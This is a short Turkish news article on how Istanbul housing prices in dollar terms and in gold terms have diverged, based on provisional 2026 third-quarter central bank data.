İstanbul konut fiyatlarında dolar-altın makası açıldı

Türkiye Cumhuriyet Merkez Bankası’nın (TCMB) 2026 yılı üçüncü çeyrek geçici verilerine göre, İstanbul konut piyasasında dolar ve altın bazlı fiyatlar son yıllarda belirgin biçimde ayrıştı.

2010’da yaklaşık 100 bin dolar seviyesinde bulunan 100 metrekarelik konut fiyatı, 2021 sonunda 88,9 bin dolara kadar geriledi. Konut fiyatları daha sonra hızla yükselerek 2023’te 188,2 bin dolara, 2026’nın üçüncü çeyreğinde ise 189,8 bin dolara ulaştı.

Altın bazında ise farklı bir tablo ortaya çıktı. 2023’te 2 bin 911 gram altına denk gelen 100 metrekarelik konutun değeri, 2026’nın üçüncü çeyreğinde 2 bin 34 grama geriledi. Böylece konutun altın karşısındaki fiyatı yaklaşık yüzde 30 azaldı.

Veriler, 2022 sonrasında konut fiyatlarının dolar karşısında yükselirken altın karşısında aynı performansı gösteremediğine işaret etti. Buna göre İstanbul’da konut dolar bazında daha pahalı hale gelirken, altınını konuta dönüştürmek isteyen yatırımcı açısından gayrimenkulün görece erişilebilirliği arttı.
